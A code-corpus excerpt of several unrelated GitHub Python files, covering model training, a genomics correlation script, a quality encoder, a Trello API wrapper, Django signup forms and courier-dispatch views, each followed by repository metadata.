torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
# Get model
log.info('Building model...')
model = investorConferenceAnalyzer(args.pce_model, args.num_labels)
model = nn.DataParallel(model, args.gpu_ids)
if args.load_path:
log.iofo(f'Loading checkpoint from {args.load_path}...')
model, step = utils.load_model(model, args.load_path, args.gpu_ids)
else:
step = 0
model = model.to(device)
model.train()
ema = utils.EMA(model, args.ema_decay)
# Get saver
saver = utils.CheckpointSaver(args.save_dir,
max_checkpoints=args.max_checkpoints,
metric_name=args.metric_name,
maximize_metric=args.maximize_metric,
log=log)
# Get optimizer and scheduler
optimizer_grouped_params = [
{'params': model.module.classifier.albert.parameters()},
{'params': model.module.classifier.classifier.parameters(), 'lr': args.lr_c}
]
optimizer = optim.AdamW(optimizer_grouped_params, args.lr,
weight_decay=args.l2_wd)
scheduler = sched.LambdaLR(optimizer, lambda s: 1.)
# Get data loader
log.info('Building dataset...')
train_dataset = Treebank(args.train_record_file)
train_loader = data.DataLoader(train_dataset,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.num_workers,
collate_fn=collate_fn)
dev_dataset = Treebank(args.dev_record_file)
dev_loader = data.DataLoader(dev_dataset,
batch_size=args.batch_size,
shuffle=False,
num_workers=args.num_workers,
collate_fn=collate_fn)
# Train
log.info('Training...')
steps_till_eval = args.eval_steps
epoch = step // len(train_dataset)
while epoch != args.num_epochs:
epoch += 1
log.info(f'Starting epoch {epoch}...')
with torch.enable_grad(), \
tqdm(total=len(train_dataset)) as progress_bar:
for input_idxs, token_type_idxs, attention_masks, ys, ids in train_loader:
# Set up for forward
input_idxs = input_idxs.to(device)
token_type_idxs = token_type_idxs.to(device)
attention_masks = attention_masks.to(device)
batch_size = input_idxs.size(0)
optimizer.zero_grad()
# Forward
log_p = model(input_idxs, token_type_idxs, attention_masks)
ys = ys.to(device)
if args.smoothing:
loss = utils.nll_loss_label_smoothing(log_p, ys, args.eps)
else:
loss = F.nll_loss(log_p, ys)
loss_val = loss.item()
# Backward
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
ema(model, step // batch_size)
# Log info
step += batch_size
progress_bar.update(batch_size)
progress_bar.set_postfix(epoch=epoch, NLL=loss_val)
tbx.add_scalar('train/NLL', loss_val, step)
tbx.add_scalar('train/LR', optimizer.param_groups[0]['lr'], step)
steps_till_eval -= batch_size
if steps_till_eval <= 0:
steps_till_eval = args.eval_steps
# Evaluate and save checkpoint
log.info(f'Evaluating at step {step}...')
ema.assign(model)
results, pred_dict = evaluate(model, dev_loader,
device, args.dev_eval_file)
saver.save(step, model, results[args.metric_name], device)
ema.resume(model)
# Log to console
results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())
log.info(f'Dev {results_str}')
# Log to TensorBoard
log.info('Visualizing in TensorBoard...')
for k, v in results.items():
tbx.add_scalar(f'dev/{k}', v, step)
utils.visualize(tbx,
pred_dict=pred_dict,
eval_path=args.dev_eval_file,
step=step,
split='dev',
num_visuals=args.num_visuals)
def evaluate(model, data_loader, device, eval_file):
nll_meter = utils.AverageMeter()
model.eval()
pred_dict = {}
# Load eval info
with open(eval_file, 'r') as fh:
gold_dict = json.load(fh)
with torch.no_grad(), \
tqdm(total=len(data_loader.dataset)) as progress_bar:
for input_idxs, token_type_idxs, attention_masks, ys, ids in data_loader:
# Set up for forward
input_idxs = input_idxs.to(device)
token_type_idxs = token_type_idxs.to(device)
attention_masks = attention_masks.to(device)
batch_size = input_idxs.size(0)
# Forward
log_p = model(input_idxs, token_type_idxs, attention_masks)
ys = ys.to(device)
loss = F.nll_loss(log_p, ys)
nll_meter.update(loss.item(), batch_size)
# Log info
progress_bar.update(batch_size)
progress_bar.set_postfix(NLL=nll_meter.avg)
# Get accuracy
p = log_p.exp()
labels = torch.argmax(p, dim=-1)
preds = utils.predict_sentiments(ids.tolist(), labels.tolist())
pred_dict.update(preds)
model.train()
results = utils.eval_dicts(gold_dict, pred_dict)
results_list = [('NLL', nll_meter.avg),
('Acc', results['Acc'])]
results = OrderedDict(results_list)
return results, pred_dict
if __name__ == '__main__':
main(get_train_args()) | Vincent25-Li/Treebank | train.py | train.py | py | 7,389 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "args.save_dir",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "utils.get_save_dir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "args.name",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "utils.get_logger... |
2515032447 | import sys
import seaborn as sns
import pandas as pd
import numpy as np
import scipy.stats
from collections import defaultdict
from matplotlib import pyplot as plt
from sklearn.metrics import r2_score, mean_absolute_error
#plt.style.use('seaborn-whitegrid')
#sns.set_theme()
#Function for creating a dictionary from the epiAneufinder data
def createDictionaryFromTable(table):
snu_dict=table.set_index(['seq', 'start', 'end']).T.to_dict('list')
return(snu_dict)
def calculatePopulationSomies(atac_dict, density_dict):
gain_atac = []
loss_atac = []
base_atac = []
common_keys = set(density_dict).intersection(atac_dict) #filtering for the common CNV locations between the two datasets
sort_common_keys=sorted(common_keys)
filtered_density_dict = {k: v for k, v in density_dict.items() if k in sort_common_keys}
#print(sort_common_keys)
counts=0
for k in sort_common_keys:
#if k[0]!=0: #selecting for all chromosomes
if k[0]!=0: # selecting for all chromosomes
counts=counts+1
#Calculating pseudobulk representation for the scATAC. 0 is loss, 1 is disomic and 2 is gain
#If the user changes notation it should be changed here as well
loss_atac.append(atac_dict[k].count(0) / len(atac_dict[k]))
base_atac.append(atac_dict[k].count(1) / len(atac_dict[k]))
gain_atac.append(atac_dict[k].count(2) / len(atac_dict[k]))
print("Count Bins:",counts)
return(loss_atac, base_atac, gain_atac, filtered_density_dict)
#Function for calculating different metrics between the two datasets and creating a line plot of the pseudoibulk data
def createLinePlot(density_dict, loss_atac, base_atac, gain_atac):
new_base_atac = [x * 2 for x in base_atac]
new_gain_atac = [x * 3 for x in gain_atac]
atac_plot = [sum(x) for x in zip(new_gain_atac, new_base_atac, loss_atac)]
atac_array=np.array(atac_plot)
density_array=[x for x in density_dict.values()]
x = list(range(len(atac_plot)))
plt.plot(x,density_array)
plt.plot(x, atac_plot, color='orange', label="ATAC")
plt.show()
#print(density_array)
print("Pearson Correlation : ",scipy.stats.pearsonr(atac_array, density_array))
print("Spearman Correlation : ", scipy.stats.spearmanr(atac_array, density_array))
print("Kendall Correlation : ", scipy.stats.kendalltau(atac_array, density_array))
if __name__ =="__main__":
density_table=pd.read_csv("/home/katia/Helmholz/epiAneufinder/Hg38_geneDensity.csv", sep="\t")
snu_full=pd.read_csv("/home/katia/Helmholz/epiAneufinder/revisions/SNU601_br15/epiAneufinder_results/results_table.tsv", sep=" ")
snu_dict=createDictionaryFromTable(snu_full)
density_dict=createDictionaryFromTable(density_table)
loss_atac, base_atac, gain_atac , filtered_density_dict= calculatePopulationSomies(snu_dict,density_dict)
#print(filtered_density_dict)
createLinePlot(filtered_density_dict, loss_atac, base_atac, gain_atac) | thek71/epiScripts | calculateCorrelationDensity.py | calculateCorrelationDensity.py | py | 3,000 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplo... |
32624805079 | from torch import nn
import torch
import numpy as np
import os
class Encoder(nn.Module):
def __init__(self, latent_dims, qc_level):
super(Encoder, self).__init__()
dims = []
if qc_level == 1:
dims = [17, 24, 8, latent_dims]
elif qc_level == 2:
dims = [22, 36, 12, latent_dims]
elif qc_level == 3:
dims = [8, 12, latent_dims]
if qc_level == 3:
self.linear1 = None
self.linear2 = nn.Linear(dims[0], dims[1])
self.linear2_bn = nn.BatchNorm1d(dims[1])
self.linear3A = nn.Linear(dims[1], dims[2])
self.linear3B = nn.Linear(dims[1], dims[2])
else:
self.linear1 = nn.Linear(dims[0], dims[1])
self.linear1_bn = nn.BatchNorm1d(dims[1])
self.linear2 = nn.Linear(dims[1], dims[2])
self.linear2_bn = nn.BatchNorm1d(dims[2])
self.linear3A = nn.Linear(dims[2], dims[3])
self.linear3B = nn.Linear(dims[2], dims[3])
def forward(self, x):
if self.linear1 is not None:
x = torch.tanh(self.linear1(x))
x = torch.tanh(self.linear1_bn(x))
x = torch.tanh(self.linear2(x))
x = torch.tanh(self.linear2_bn(x))
mu = self.linear3A(x)
logvar = self.linear3B(x)
return mu, logvar
class QualityEncoder(object):
def __init__(self, device='auto', encoder_type1_path=None, encoder_type2_path=None, encoder_type3_path=None, encoder_dim = [2, 2, 2]):
self.encoder_type1_path = encoder_type1_path
self.encoder_type2_path = encoder_type2_path
self.encoder_type3_path = encoder_type3_path
if not self.encoder_type1_path:
self.encoder_type1_path = os.path.join(os.path.split(__file__)[0], 'encoder', 'quality_encoder_type1.pickle')
if not self.encoder_type2_path:
self.encoder_type2_path = os.path.join(os.path.split(__file__)[0], 'encoder', 'quality_encoder_type2.pickle')
if not self.encoder_type3_path:
self.encoder_type3_path = os.path.join(os.path.split(__file__)[0], 'encoder', 'quality_encoder_type3.pickle')
self.type1_encoder = Encoder(encoder_dim[0], qc_level=1)
self.type2_encoder = Encoder(encoder_dim[1], qc_level=2)
self.type3_encoder = Encoder(encoder_dim[2], qc_level=3)
self.type1_quality_refs = [
[0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 1.0, 0.0, 0.0],
[0.3, 0.4, 0.3, 0.3, 0.335, 0.475, 0.3, 0.3, 0.4, 0.3, 0.3, 0.335, 0.475, 0.3, 0.7, 0.3, 0.3],
[1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 0.0, 1.0, 1.0],
[0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 0.0, 1.0, 1.0],
[1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 0.0, 1.0, 1.0]
]
self.type2_quality_refs = [
[0.0, 1.0, 1.0, 0.0, 0.0, 0.200, 0.200, 0.0, 1.0, 1.0, 0.0, 0.0, 0.200, 0.200, 1.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.200, 0.200],
[0.2, 0.6, 0.6, 0.2, 0.2, 0.360, 0.360, 0.2, 0.6, 0.6, 0.2, 0.2, 0.360, 0.360, 0.6, 0.2, 0.6, 0.6, 0.2, 0.2, 0.360, 0.360],
[1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 0.0, 1.0, 1.0, 0.0, 0.0, 0.050, 0.250, -1.0, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000], # good heavy only; worst others
[0.0, 1.0, 1.0, 0.0, 0.0, 0.050, 0.250, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, -1.0, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000], # bad heavy only
[1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, -1.0, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000]
]
self.type3_quality_refs = [
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.5, 0.3, 0.9, 1.5, 0.3, 0.9, 0.3, 0.3],
[5.0, 1.0, 3.0, 0.0, 0.0, 0.0, 1.0, 1.0],
[0.0, 0.0, 0.0, 5.0, 1.0, 3.0, 1.0, 1.0],
[5.0, 1.0, 3.0, 5.0, 1.0, 3.0, 1.0, 1.0]
]
if device == 'auto':
self.device = "cuda" if torch.cuda.is_available() else "cpu"
else:
self.device = device
print('device: ' + self.device)
self.load_encoder()
self._update_reference_latents()
def __call__(self, quality_vectors, normalize=True):
qv = torch.tensor(quality_vectors, dtype=torch.float32).to(self.device)
dim = qv.shape[1]
if dim == 17:
latent = self.type1_encoder(qv)[0].cpu().detach().numpy()
score = self.score_type1_latent(latent)
type = 1
elif dim == 22:
latent = self.type2_encoder(qv)[0].cpu().detach().numpy()
score = self.score_type2_latent(latent)
type = 2
elif dim == 8:
latent = self.type3_encoder(qv)[0].cpu().detach().numpy()
score = self.score_type3_latent(latent)
type = 3
else:
raise 'Unkonw dimension. Valid dimensions are 17 for type 1 quality, 22 for type 2 quality, and 8 for type 3 quality.'
if normalize:
return self.normalize_score(type, score), latent
else:
return score, latent
def load_encoder(self):
self.type1_encoder.load_state_dict(torch.load(self.encoder_type1_path, map_location=self.device))
self.type2_encoder.load_state_dict(torch.load(self.encoder_type2_path, map_location=self.device))
self.type3_encoder.load_state_dict(torch.load(self.encoder_type3_path, map_location=self.device))
self.type1_encoder.to(self.device)
self.type2_encoder.to(self.device)
self.type3_encoder.to(self.device)
self.type1_encoder.eval()
self.type2_encoder.eval()
self.type3_encoder.eval()
self._update_reference_latents()
def _update_reference_latents(self):
self.type1_latent_points = self.type1_encoder(torch.tensor(self.type1_quality_refs).to(self.device))[0].to('cpu').detach().numpy()
self.type2_latent_points = self.type2_encoder(torch.tensor(self.type2_quality_refs).to(self.device))[0].to('cpu').detach().numpy()
self.type3_latent_points = self.type3_encoder(torch.tensor(self.type3_quality_refs).to(self.device))[0].to('cpu').detach().numpy()
self._score_range = [
dict(max= self.score_type1_latent([self.type1_latent_points[0]])[0], min=self.score_type1_latent([self.type1_latent_points[4]])[0]),
dict(max= self.score_type2_latent([self.type2_latent_points[0]])[0], min=self.score_type2_latent([self.type2_latent_points[4]])[0]),
dict(max= self.score_type3_latent([self.type3_latent_points[0]])[0], min=self.score_type3_latent([self.type3_latent_points[4]])[0])
]
def encode_quality(self, quality_vectors):
qv = torch.tensor(quality_vectors, dtype=torch.float32).to(self.device)
dim = qv.shape[1]
if dim == 17:
return self.type1_encoder(torch.tensor(qv, dtype=torch.float32).to(self.device))[0].detach().numpy()
elif dim == 22:
return self.type2_encoder(torch.tensor(qv, dtype=torch.float32).to(self.device))[0].detach().numpy()
elif dim == 8:
return self.type3_encoder(torch.tensor(qv, dtype=torch.float32).to(self.device))[0].detach().numpy()
else:
raise 'Unkonw dimension. Valid dimensions are 17 for type 1 quality, 22 for type 2 quality, and 8 for type 3 quality.'
# def encode_type1_quality(self, quality_vector):
# return self.type1_encoder(torch.tensor(quality_vector, dtype=torch.float32).to(self.device))[0].detach().numpy()
# def encode_type2_quality(self, quality_vector):
# return self.type2_encoder(torch.tensor(quality_vector, dtype=torch.float32).to(self.device))[0].detach().numpy()
# def encode_type3_quality(self, quality_vector):
# return self.type3_encoder(torch.tensor(quality_vector, dtype=torch.float32).to(self.device))[0].detach().numpy()
def score_type1_latent(self, type1_latents):
return self.score_func(type1_latents, self.type1_latent_points)
def score_type2_latent(self, type2_latents):
return self.score_func(type2_latents, self.type2_latent_points)
def score_type3_latent(self, type3_latents):
return self.score_func(type3_latents, self.type3_latent_points)
def normalize_score(self, type, score):
if type <= 0 or type >=4:
return
min = self._score_range[type - 1]['min']
max = self._score_range[type - 1]['max']
return -10 + 20 * ((score - min)/(max - min))
def score_func(self, latent_points, ref_latent_points):
# ref_latent_points = self._ref_latent_points
dist_max = np.linalg.norm(ref_latent_points[0] - ref_latent_points[4])
score = 2 * (1 - (self.dist_func(latent_points, ref_latent_points[0])/dist_max)**0.5)
score = score + 1 * (1 - (self.dist_func(latent_points, ref_latent_points[1])/dist_max)**0.5)
score = score + 1 * (1 - (self.dist_func(latent_points, ref_latent_points[2])/dist_max)**0.5)
score = score - 1 * (1 - (self.dist_func(latent_points, ref_latent_points[3])/dist_max)**0.5)
score = score - 2 * (1 - (self.dist_func(latent_points, ref_latent_points[4])/dist_max)**0.5)
return score
def dist_func(self, a, b):
return np.linalg.norm(a - b, axis=1)
| chiyang/tmasque | tmasque/QualityEncoder.py | QualityEncoder.py | py | 8,839 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
21892894147 | from django.urls import path
from accounts import views
app_name='accounts'
urlpatterns=[
path('register',views.register,name='register'),
path('login',views.login,name='login'),
path('logout',views.logout,name='logout'),
path('page1',views.page1,name='page1'),
path('r^create_view/',views.create_view,name='create_view'),
path('<int:pk>/', views.person_update_view, name='person_change'),
path('ajax/load-cities/', views.load_cities, name='ajax_load_cities'),#AJAX
path('msg/',views.msg,name='msg')
] | amalarosebenny/farming | collegeproject/accounts/urls.py | urls.py | py | 533 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "accounts.views.register",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "accounts.views",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.urls... |
20886565147 | #!/usr/bin/env python
"""
Identifies groups of medium order (512, 1152, 1536, 1920, 2187, 6561, 15625, 16807, 78125, 161051)
by connecting to devmirror.lmfdb.xyz and using the stored hashes there.
Usage:
Either provide an input file with hashes to identify, one per line, each of the form N.i
./identify.py -i INPUT_FILE.txt -o OUTPUT_FILE.txt
or provide the input
or provide the input at the command line, separated by newlines
./identify.py < echo "512.1"
Output is written to the designated output file, or sent to stdout (if no output file given)
"""
import os
import sys
import argparse
from collections import defaultdict
from psycopg2 import connect
from psycopg2.sql import SQL, Identifier
## We avoid using the LMFDB to eliminate the dependency on Sage
#opj, ops, ope = os.path.join, os.path.split, os.path.exists
#root = os.getcwd()
## This repo contains an LMFDB folder, and some OSes (like OS X) are not case sensitive
#while not (ope(opj(root, "lmfdb")) and ope(opj(root, "lmfdb", "start-lmfdb.py"))):
# newroot = ops(root)[0]
# if root == newroot:
# raise ModuleNotFoundError("No path to the LMFDB in the current directory")
# root = newroot
#sys.path.append(opj(root, "lmfdb"))
# Importing db from the LMFDB prints a bunch of garbage, so we disable printing for a bit
#savedstdout = sys.stdout
#savedstderr = sys.stderr
#with open(os.devnull, 'w') as F:
# try:
# sys.stdout = F
# sys.stderr = F
# from lmfdb import db
# finally:
# sys.stdout = savedstdout
# sys.stderr = savedstderr
SMALLHASHED = [512, 1152, 1536, 1920, 2187, 6561, 15625, 16807, 78125, 161051]
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", help="file containing the hashes to identify, one per line, each of the form N.hsh")
parser.add_argument("-o", "--output", help="file to write the output, lines corresponding to input")
parser.add_argument("hashes", nargs="*", help="input hashes at the command line")
args = parser.parse_args()
if args.hashes:
hashes = args.hashes
elif args.input:
with open(args.input) as F:
hashes = list(F)
else:
hashes = sys.stdin.read().split("\n")
# The following code will need to be updated once gps_groups has hashes and we support identification of larger groups
hashes = [tuple(int(c) for c in hsh.split(".")) for hsh in hashes if hsh.strip()]
hashlookup = defaultdict(list)
## Reduce number of database calls by grouping by order
byord = defaultdict(set)
for N, hsh in hashes:
if N in SMALLHASHED:
byord[N].add(hsh)
for N in list(byord):
byord[N] = sorted(byord[N])
#if len(byord) > 1:
# query = {"$or": [{"order": N, "hash": ({"$in": L} if len(L) > 1 else L[0])} for (N, L) in byord.items()]}
#else:
# N = list(byord)[0]
# L = byord[N]
# query = {"order": N, "hash": ({"$in": L} if len(L) > 1 else L[0])}
#for rec in db.gps_smallhash.search(query, silent=True):
# hashlookup[rec["order"], rec["hash"]].append(f'{rec["order"]}.{rec["counter"]}')
# We set up the connection manually using psycopg2 to remove dependencies on the LMFDB and Sage for code running on google cloud
conn = connect(dbname="lmfdb", user="lmfdb", password="lmfdb", host="devmirror.lmfdb.xyz")
cur = conn.cursor()
it = byord.items()
opt1 = SQL("({0} = %s AND {1} = ANY(%s))").format(Identifier("order"), Identifier("hash"))
opt2 = SQL("({0} = %s AND {1} = %s)").format(Identifier("order"), Identifier("hash"))
query = SQL(" OR ").join(opt1 if len(L) > 1 else opt2 for (N, L) in it)
values = []
for N, L in it:
if len(L) > 1:
values.extend([N, L])
else:
values.extend([N, L[0]])
query = SQL("SELECT {0}, {1}, {2} FROM gps_smallhash WHERE {3}").format(Identifier("order"), Identifier("hash"), Identifier("counter"), query)
cur.execute(query, values)
for vec in cur:
hashlookup[vec[0], vec[1]].append(f'{vec[0]}.{vec[2]}')
out = [hashlookup.get(pair, [f"{pair[0]}.0"]) for pair in hashes]
if args.output:
with open(args.output, "a") as F:
for opts in out:
_ = F.write("|".join(opts) + "\n")
else:
for opts in out:
print("|".join(opts))
| roed314/FiniteGroups | Code/identify.py | identify.py | py | 4,140 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "sys.stdin.read",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "collections.def... |
72164631784 | # -*- encoding: utf-8 -*-
# External imports
import requests
import json
import datetime
# ---------------------------------------- Ne pas mettre là
# # Load settings
# with open('settings.json', encoding="utf-8") as f:
# settings = json.load(f)
# # Get the original file
# API_KEY = settings["API_KEY"]
# TOKEN = settings["TOKEN"]
# idList = settings["create_card_default_list_id"]
# idLabels = ["636b89573b1806052382168b", "6371f95494e5ba0140868cdd"]
# name = "Test création Python"
# desc = "Test description"
# ---------------------------------------- Fin du ne pas mettre là
class Trello_API_cards(object):
    """Trello_API_cards
    =======
    Thin wrapper around the Trello ``/1/cards`` REST endpoint. The request is
    built and sent immediately on construction; afterwards check
    ``self.status`` ("Success" / "Error") and read ``self.data`` (parsed JSON)
    or ``self.error_msg``.

    On init take as arguments :
    - api {str} : name of the API to call
        - "new_card"
        - "update_card"
        - "new_comment"
        - "add_label"
        - "remove_label"
    - API_KEY {str}
    - TOKEN {str}
    - [optional] service {str} : name of the service
    - data {dict} : all informations needed to use the API

    Raises:
        ValueError: if ``api`` is not one of the five supported names.
    """
    def __init__(self, api , API_KEY, TOKEN, service='Trello_Cards', data=None):
        # Fresh dict per call: avoids the shared-mutable-default pitfall of
        # the original ``data={}`` signature (backward-compatible change).
        if data is None:
            data = {}
        # self.logger = logging.getLogger(service)
        self.endpoint = "https://api.trello.com/1/cards"
        self.service = service
        self.payload = {
            'key': API_KEY,
            'token': TOKEN
        }
        self.headers = {
            "Accept":"application/json"
        }
        # Select HTTP method / URL / payload for the requested API
        if api == "new_card":
            self.payload["pos"] = "top"
            self.payload["start"] = datetime.datetime.now().isoformat()
            self.payload["idList"] = data["idList"]
            self.payload["idLabels"] = data["idLabels"]
            self.payload["name"] = data["name"]
            self.payload["desc"] = data["desc"]
            self.HTTPmethod = "POST"
            self.url = self.endpoint
        elif api == "update_card":
            # Only forward the optional card fields the caller supplied.
            param_list = ["pos", "idList", "idLabels", "name", "desc"]
            for param in param_list:
                if param in data:
                    self.payload[param] = data[param]
            self.HTTPmethod = "PUT"
            self.url = self.endpoint + "/{}".format(data["id"])
        elif api == "new_comment":
            self.payload["text"] = data["text"]
            self.HTTPmethod = "POST"
            self.url = self.endpoint + "/{}/actions/comments".format(data["id"])
        elif api == "add_label":
            self.payload["value"] = data["value"]
            self.HTTPmethod = "POST"
            self.url = self.endpoint + "/{}/idLabels".format(data["id"])
        elif api == "remove_label":
            self.HTTPmethod = "DELETE"
            self.url = self.endpoint + "/{}/idLabels/{}".format(data["id"], data["idLabel"])
        else:
            # Fail fast: the original fell through and crashed below with an
            # opaque AttributeError on self.HTTPmethod.
            raise ValueError("Unknown Trello cards API: {!r}".format(api))
        try:
            r = requests.request(self.HTTPmethod, self.url, headers=self.headers, params=self.payload)
            r.raise_for_status()
        except requests.exceptions.HTTPError:
            self.status = 'Error'
            # self.logger.error("{} :: {} :: HTTP Status: {} || Method: {} || URL: {} || Response: {}".format(query, service, r.status_code, r.request.method, r.url, r.text))
            # NOTE(review): message mentions "Biblionumber" -- looks copy-pasted
            # from a Koha API wrapper (see commented log line below); confirm wording.
            self.error_msg = "Biblionumber inconnu ou service indisponible"
        except requests.exceptions.RequestException as generic_error:
            self.status = 'Error'
            # self.logger.error("{} :: Koha_API_PublicBiblio_Init :: Generic exception || URL: {} || {}".format(bibnb, url, generic_error))
            self.error_msg = "Exception générique, voir les logs pour plus de détails"
        else:
            self.response = r.content.decode('utf-8')
            self.data = json.loads(self.response)
            self.status = 'Success'
            # self.logger.debug("{} :: {} :: Notice trouvée".format(query, service))
{
"api_name": "datetime.datetime.now",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "requests.request",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "request... |
22377866084 | from django import forms
from django.db import transaction
from .models import CustomUser
from django.contrib.auth.forms import UserCreationForm,UserChangeForm
class CustomerSignUpForm(UserCreationForm):
    """Registration form for customer accounts.
    Extends the stock ``UserCreationForm`` with the extra profile fields
    declared in ``Meta.fields`` and flags the created user as a customer.
    """
    class Meta:
        model=CustomUser
        fields = ('username', 'name', 'email', 'number', 'address')
    @transaction.atomic
    def save(self):
        """Create the user with ``is_customer=True`` inside one transaction.
        NOTE(review): this narrows ``ModelForm.save(self, commit=True)`` to
        ``save(self)``; any caller passing ``commit=`` would break -- confirm
        this is intentional.
        """
        user = super().save(commit=False)  # build the instance without writing yet
        user.is_customer = True
        user.save()
        return user
class StartupSignUpForm(UserCreationForm):
    """Registration form for startup accounts.
    Same shape as ``CustomerSignUpForm`` but adds the startup-specific
    ``dipp`` and ``description`` fields and sets ``is_startup``.
    """
    class Meta:
        model=CustomUser
        fields = ('username', 'name', 'email', 'number', 'address','dipp','description')
    @transaction.atomic
    def save(self):
        """Create the user with ``is_startup=True`` inside one transaction.
        NOTE(review): narrows ``ModelForm.save(self, commit=True)`` to
        ``save(self)`` -- confirm no caller passes ``commit=``.
        """
        user = super().save(commit=False)  # build the instance without writing yet
        user.is_startup = True
        user.save()
        return user
{
"api_name": "django.contrib.auth.forms.UserCreationForm",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "models.CustomUser",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.db.transaction.atomic",
"line_number": 11,
"usage_type": "attribute"
... |
74361688425 | from datetime import datetime
import logging
from django.contrib.auth import authenticate
from django.core import serializers
from django.http import HttpResponse, HttpResponseBadRequest
from django.shortcuts import get_object_or_404
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import login as auth_login
from dispatch.models import ETurtleGroup as Group
from server.dispatch.dispatcher import run_dispatcher
from server.dispatch.models import Courier, Dispatch, Package
from server.utils import api_permission_required, HttpResponseUnauthorized
import json
@csrf_exempt
def loginview(request):
    """POST {username, password}: authenticate and open a session.
    Returns 400 on non-POST or missing fields, 401 when credentials are bad,
    the account is inactive, or it lacks the ``dispatch.api_access`` perm.
    """
    if request.method != 'POST':
        return HttpResponseBadRequest("post required")
    # Original used .get('username' or None): the inner ``or`` always yields
    # the literal key, so this is just .get('username') -- written directly.
    username = request.POST.get('username')
    password = request.POST.get('password')
    if not (username and password):
        return HttpResponseBadRequest("invalid or missing parameters")
    user = authenticate(username=username, password=password)
    if user and user.is_active and user.has_perm("dispatch.api_access"):
        auth_login(request, user)
        return HttpResponse("Logged in")
    return HttpResponseUnauthorized('Unauthorized')  # typo fix: was 'Unathorized'
@api_permission_required
def check_in(request):
    """Mark the calling courier as standing by and kick the dispatcher."""
    me = Courier.objects.get(id=request.user.id)
    me.state = Courier.STATE_STANDING_BY
    me.save()
    run_dispatcher()  # newly available courier may unblock a package
    return HttpResponse('checked in')
@api_permission_required
def leave(request):
    """Courier goes off duty: set them IDLE and release any pending dispatch.
    If a dispatch was pending for this courier it is marked REJECTED and its
    package returned to the NEW pool so the dispatcher can reassign it.
    """
    courier = Courier.objects.get(id=request.user.id)
    courier.state = Courier.STATE_IDLE
    courier.save()
    try:
        dispatch = Dispatch.objects.get(courier=courier, state=Dispatch.STATE_PENDING)
    except Dispatch.DoesNotExist:
        pass  # nothing was pending -- nothing to release
    else:
        #updates the state of the Dispatch
        dispatch.state = Dispatch.STATE_REJECTED
        dispatch.save()
        #updates the state of the Package
        dispatch.package.state=Package.STATE_NEW
        dispatch.package.save()
    run_dispatcher()
    return HttpResponse('left')
@api_permission_required
def decline(request):
    """Courier declines the dispatch currently pending for them (404 if none).
    Dispatch -> REJECTED, courier -> STANDING_BY, package -> NEW, then the
    dispatcher runs again to try another courier.
    """
    courier = Courier.objects.get(id=request.user.id)
    dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_PENDING)
    #updates the state of the Dispatch
    dispatch.state = Dispatch.STATE_REJECTED
    dispatch.save()
    #updates the state of the Courier
    courier.state = Courier.STATE_STANDING_BY
    courier.save()
    #updates the state of the Package
    dispatch.package.state=Package.STATE_NEW
    dispatch.package.save()
    run_dispatcher()
    return HttpResponse('declined')
@api_permission_required
def get(request):
    """Return the package of the courier's pending dispatch as JSON (404 if none)."""
    courier = Courier.objects.get(id=request.user.id)
    dispatch = get_object_or_404(Dispatch, courier=courier, state=Dispatch.STATE_PENDING)
    package = dispatch.package
    dump = package.serialize()  # NOTE(review): format is defined by Package.serialize -- assumed JSON, per header below
    response = HttpResponse(dump)
    response['Content-Type'] = 'application/json; charset=utf-8'
    return response
@api_permission_required
def accept(request):
    """Courier accepts the pending dispatch: dispatch, courier and package all
